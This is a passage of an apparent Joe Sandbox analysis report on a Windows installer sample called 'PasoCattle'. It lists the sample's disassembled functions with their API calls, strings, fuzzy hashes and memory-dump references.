Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
API String ID: 247603264-1827671502
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
@, xrefs: 00404BBC
M, xrefs: 00404B6F
, xrefs: 00404F65

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

